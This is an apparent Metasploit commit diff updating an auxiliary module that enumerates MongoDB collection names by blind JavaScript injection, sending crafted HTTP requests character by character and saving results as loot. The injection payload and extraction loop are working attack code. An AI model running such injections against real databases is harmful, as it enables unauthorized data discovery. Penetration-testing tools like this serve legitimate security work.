Update mongodb_js_inject_collection_enum.rb

some @jvennix-r7 fixes
rapid7 · Jun 11, 2014 · cca91dd · cca91dd
1 parent 4367e8e
commit cca91dd
Showing 1 changed file with 14 additions and 3 deletions.
diff --git a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
@@ -9,6 +9,7 @@ class Metasploit4 < Msf::Auxiliary
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super(update_info(info,
@@ -99,7 +100,8 @@ def run
 
     vprint_status("Getting collection names")
 
-    (0..length-1).each do |i|
+    names = []
+    (0...length).each do |i|
       vprint_status("Getting length of name for collection " + i.to_s)
 
       name_len = 0
@@ -119,8 +121,8 @@ def run
       vprint_status("Getting collection #{i}'s name")
 
       name = ''
-      (0..name_len-1).each do |k|
-        [*('a'..'z'),*('0'..'9')].each do |c|
+      (0...name_len).each do |k|
+        [*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
           str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
           res = send_request_cgi({
             'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
@@ -134,7 +136,16 @@ def run
       end
 
       print_status("Collections #{i}'s name is " + name)
+      names << name
     end
 
+    p = store_loot("mongo_injection.#{datastore['RHOST']}_collections",
+                   "text/plain",
+                   nil,
+                   names.to_json,
+                   "mongo_injection_#{datastore['RHOST']}.txt",
+                   "#{datastore["RHOST"]} MongoDB Javascript Injection Collection Enumeration")
+
+    print_good("Your collections are located at: " + p)
   end
 end